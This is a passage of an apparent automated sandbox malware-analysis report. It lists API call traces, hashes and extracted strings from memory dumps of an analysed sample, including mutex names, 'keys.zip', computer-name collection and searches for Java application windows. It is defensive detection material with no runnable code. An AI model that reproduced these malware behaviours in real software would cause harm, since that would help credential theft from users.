                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                            • API String ID: 4173420962-1701721152
                                                                                                                                                                                                            • Opcode ID: c9728fffeae7bebabb120f8af099eeea7574f2594a7aa071a9635a118bd4e80e
                                                                                                                                                                                                            • Instruction ID: 17d90afdf5bf5e5a5ff614d7e8a6d35884979228bb7e529a97e0fd2ac6cf6099
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9728fffeae7bebabb120f8af099eeea7574f2594a7aa071a9635a118bd4e80e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0101D630AC67127BF37157A84C4AF8E36989F04B95F104654FB6A761C097E095048BAA
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$malloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2190258309-0
                                                                                                                                                                                                            • Opcode ID: 4a15916ac8bc6abc2fe2c6db27c7bf57d77e59468c25e4416f5a0c02237f86a8
                                                                                                                                                                                                            • Instruction ID: 17ab6b3c8d91d0f1395282d63e341f22f7b90562148f0d5d61060ed70478eadd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a15916ac8bc6abc2fe2c6db27c7bf57d77e59468c25e4416f5a0c02237f86a8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C84131B1D416118BC721DFD8E8C0B9AB7A5EB44B14F1B4EB9E44A47608E731A860CFD2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c35d695e3bd8e19de5a0471123e2fc32ff4311193cf77c9fc93b21f1187ca94c
                                                                                                                                                                                                            • Instruction ID: 14a43275888d6cb6a7b5411c98b97984546beb866c874734d84ecda34e4a60e3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c35d695e3bd8e19de5a0471123e2fc32ff4311193cf77c9fc93b21f1187ca94c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94C1D471A106169FCB14CF2CC8A4BAB7BB5EF49344B2482C8ED59EB341D731EA05CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                            • Opcode ID: ebdefe0ccf7dca4d477b1ac3c68d8fca596ad1d5551be48629f1ca220201ef3e
                                                                                                                                                                                                            • Instruction ID: 899c3b54fc84715de8db1ab819a65c2972a449072b2a6a59033f0abab28b18a8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebdefe0ccf7dca4d477b1ac3c68d8fca596ad1d5551be48629f1ca220201ef3e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3513FB1D412159ADB50DF94C884AEB7BB9AF08340F0441BAEE0CAF285D7745645CFE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D098), ref: 02BD3B70
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3BB1
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD3BBB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD3BC3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD3BD4
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD3BDB
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD3BE8
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D098,?,02BD3D9C), ref: 02BD3C57
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: keys.zip$path1.txt
                                                                                                                                                                                                            • API String ID: 1373881290-1274251082
                                                                                                                                                                                                            • Opcode ID: 458abd76119522f9249da9a04a44250f75919daf90a7f6d978517eda264d8423
                                                                                                                                                                                                            • Instruction ID: b130c36ab5bc641ae5260634855e32cce1384bdbf5e97494b5fa8f7c66111347
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 458abd76119522f9249da9a04a44250f75919daf90a7f6d978517eda264d8423
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74410B715047454BCB258F3898A4BEABBE5FF56340F0489D4EACAD7301EB71D984CB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD5124
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5133
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD513A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD5152
                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5169
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD516F
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,76DC34D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: memset.MSVCRT ref: 02BC4215
                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5190
                                                                                                                                                                                                            • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51B7
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51CB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 02BD5100
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                            • API String ID: 734199406-1705633369
                                                                                                                                                                                                            • Opcode ID: 59407088c45d3f96c12e9dce8df0aec07d858e74a022405fea52fa324c200e17
                                                                                                                                                                                                            • Instruction ID: 0e9cf4be968420a69ab9577f85f06457942fe9f2421a44671ff3d99cab780442
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59407088c45d3f96c12e9dce8df0aec07d858e74a022405fea52fa324c200e17
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73214BB2D00209A7D73196649C44FFFB7BDDFC4751F600599FA45A7140FBB0AA858BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 02BD53BE
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BD53D2
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02BC56AF), ref: 02BD53E3
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02BD53F3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02BC56AF), ref: 02BD5430
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02BC56AF), ref: 02BD5433
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02BC56AF), ref: 02BD5440
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,02BC56AF), ref: 02BD5443
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1866686876-3277137149
                                                                                                                                                                                                            • Opcode ID: 5f1ff0a7f5f79077544492c81645d3fb017464aeecada54f94fdc10154486e5f
                                                                                                                                                                                                            • Instruction ID: d306593d33da86453497e9890489daf807d48075d96c7a9859f061b54284835c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f1ff0a7f5f79077544492c81645d3fb017464aeecada54f94fdc10154486e5f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E811B631A812017BD7709B759C08FDB7BADEF84795F848954FA05D3140EB75E610CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02BD440C
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD4422
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02BD4430
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD4439
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD4451
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD4463
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD446E
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0D19C,VEFK), ref: 02BD4488
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                            • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$VEFK
                                                                                                                                                                                                            • API String ID: 849374196-3911370694
                                                                                                                                                                                                            • Opcode ID: 74c070173a625b91f7cc3745d2a0c81690cef5ac9c0f3d0cb3d2865b227f30e5
                                                                                                                                                                                                            • Instruction ID: 6e5379fd9e14bbcd310906457cba0bb8ce58d7863ce2144634fe176fa982e413
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74c070173a625b91f7cc3745d2a0c81690cef5ac9c0f3d0cb3d2865b227f30e5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3501D631AC17152AE27157A89C46F9EB398DF44B60F458694FF45A7180AFF0A8004AA5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02BFA450), ref: 02BD0121
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02BFA488), ref: 02BD0131
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02BFA4B8), ref: 02BD0141
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02BFA4D8), ref: 02BD0151
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02BFA450), ref: 02BD0161
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02BFA488), ref: 02BD0171
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02BFA4B8), ref: 02BD0181
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02BFA4D8), ref: 02BD0191
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FindWindow
                                                                                                                                                                                                            • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                            • API String ID: 134000473-1757792087
                                                                                                                                                                                                            • Opcode ID: 6c0378dc8aec1016bc5a9e336741f4cfc87bfd9cbb9a6c626d562103563487b0
                                                                                                                                                                                                            • Instruction ID: 6507347dabeeb9bb17e0e6c5bbc881a96df2ad1623b503f180b81ea67488e093
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c0378dc8aec1016bc5a9e336741f4cfc87bfd9cbb9a6c626d562103563487b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8F07A947C2327687AD8716D3D0AFA53B444B90EC9B4984D2BF5EF9028F6C0F48A05F1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02BCCBAC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCCBB9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCCBCD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCCBDF
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCCBEE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCCBF5
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C260,BSS), ref: 02BCCC0F
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCCC15
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02BCCBA0
                                                                                                                                                                                                            • BSS, xrefs: 02BCCBFB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                            • String ID: BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                            • API String ID: 3206501308-3528105533
                                                                                                                                                                                                            • Opcode ID: b9198685e6f8360afb788fb5f271cd940dd87b445aece72c0dc3395b7549ed77
                                                                                                                                                                                                            • Instruction ID: 5628affa57d5bea8c31145610786fadca07330723ef85a4cf5566143a11be4cc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9198685e6f8360afb788fb5f271cd940dd87b445aece72c0dc3395b7549ed77
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76017B30AC9705BBE26167A4AC09F0B7B9C9F08F90F60074DFB5AA31C09BB0940087B6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,76F93050,76F930D0,76F93080), ref: 02BB91F0
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB9204
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB920F
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02BB9237
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB9254
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB9265
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BB9285
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BB929C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB92DC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02BB9324
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02BB932D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2125184990-0
                                                                                                                                                                                                            • Opcode ID: 20f10a510a81ef053ed4583aca36543a4f859f0ab5dca3e425710381b5e5047b
                                                                                                                                                                                                            • Instruction ID: c0ef45637424ea677fc3a5773095195ce87454e17970645b28d93282a4fe0ba3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20f10a510a81ef053ed4583aca36543a4f859f0ab5dca3e425710381b5e5047b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC41E071E80240ABD7209FA4EC84FBA77A9AB48750F104E45FB61972C6C6F0E820CF60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC01F4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BC020C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC020F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC021C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC021F
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,-02BFFAE4), ref: 02BC023C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02BC0259
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC0260
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0270
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC02B5
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC02C9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3911349929-0
                                                                                                                                                                                                            • Opcode ID: ea13bc43d418810d208c7041b71f86a2f7dcb1b5b112fea86db6e8778ce682ae
                                                                                                                                                                                                            • Instruction ID: feb3dd982e59b500c3bf38f771ceabc178be96fd4ff11dae9ef7b2fc5fd39a39
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea13bc43d418810d208c7041b71f86a2f7dcb1b5b112fea86db6e8778ce682ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F417472A40304EFD760DFA8DC84F6BB7B8EB44710F10895CEA859B680DB70E954CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0071
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 02BC008C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC008F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC009C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC009F
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02BC00BC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02BC00D9
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC00E0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC00F0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0109
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC011C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3911349929-0
                                                                                                                                                                                                            • Opcode ID: 5743bb387d8615b11038e991de635afa20a39f54365ddf834c27831924261390
                                                                                                                                                                                                            • Instruction ID: 706c5575e99de2f8b4e85f26da49726b52a7f303223725eea82b62693c771cb0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5743bb387d8615b11038e991de635afa20a39f54365ddf834c27831924261390
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B331C072A40214ABE760DA68DC88F57B7ACEF48760F148584FA489B281DB30A9158BF0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,-057FF5C8,00000000,00000000,?,?,?,?), ref: 02BBF404
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BBF40B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BBF41B
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBF426
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02BF56DC,?,02BF5E1C,-057FF5C8,00000000,00000000,?), ref: 02BBF4EE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BBF4F5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000), ref: 02BBF501
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BBF508
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBF52E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,-057FF5C8,00000000,00000000,?,?,?,?), ref: 02BBF55A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BBF55D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BBF56A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BBF56D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1948005343-0
